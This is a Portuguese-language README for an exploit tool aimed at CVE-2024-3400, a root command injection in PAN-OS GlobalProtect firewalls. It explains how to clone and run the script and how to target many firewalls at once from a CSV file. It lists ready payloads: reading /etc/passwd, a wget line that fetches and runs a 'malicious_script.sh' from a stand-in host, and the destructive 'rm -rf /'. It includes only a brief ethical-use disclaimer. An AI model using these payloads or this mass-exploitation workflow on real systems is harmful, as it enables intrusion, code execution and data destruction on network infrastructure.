
# Script de exploração para CVE-2024-3400, uma injeção de comandos no PAN-OS GlobalProtect, permitindo execução remota de código não autenticada com privilégios de root. Suporta exploração de alvo único e múltiplos alvos baseada em CSV.
Este script foi projetado para demonstrar a exploração de vulnerabilidades em firewalls PAN-OS. Ele envia um payload especialmente elaborado para o endpoint de API do firewall para executar comandos arbitrários. Esta exploração visa especificamente a CVE-2024-3400, uma vulnerabilidade de injeção de comandos no recurso GlobalProtect do software PAN-OS da Palo Alto Networks para versões específicas do PAN-OS. Configurações distintas de recursos podem permitir que um atacante não autenticado execute código arbitrário com privilégios de root no firewall.
Nota: Certifique-se de usar este script apenas para fins legais e éticos, e apenas em máquinas nas quais você tenha permissão para testar.
Para usar este projeto, siga estes passos:
git clone https://github.com/Yuvvi01/CVE-2024-3400
cd CVE-2024-3400
pip install -r requirements.txt
python3 exploit.py
Siga as instruções para inserir o endereço IP do firewall PAN-OS vulnerável e o payload a ser executado.
ls -la
cat /etc/passwd
whoami
wget http://example.com/malicious_script.sh -O /tmp/malicious_script.sh && chmod +x /tmp/malicious_script.sh && /tmp/malicious_script.sh
rm -rf /
O script solicitará o caminho do arquivo do certificado SSL do servidor firewall PAN-OS. Se nenhum caminho for fornecido, o script definirá automaticamente a verificação SSL como falsa, efetivamente desabilitando o SSL.
Este script permite explorar vários alvos de firewalls PAN-OS vulneráveis usando um arquivo CSV. Abaixo estão as instruções para formatar o arquivo CSV corretamente:
O arquivo CSV deve ter três colunas:
ipaddress: O endereço IP do firewall PAN-OS vulnerável. payload: O payload a ser executado no firewall. path/to/root_CA_certificate.pem: O caminho para o certificado raiz da CA (deixe em branco se a verificação do certificado estiver desabilitada).
ipaddress,payload,path/to/root_CA_certificate.pem
192.168.1.1,exploit_payload1,/path/to/certificate.pem
192.168.1.2,exploit_payload2,
Crie um arquivo CSV com o formato especificado. Preencha os endereços IP, payloads e caminhos dos certificados raiz da CA (se aplicável). Certifique-se de fornecer caminhos válidos para os certificados raiz da CA ou deixe o campo em branco se a verificação do certificado estiver desabilitada. Execute o script e escolha a opção de usar o arquivo CSV quando solicitado.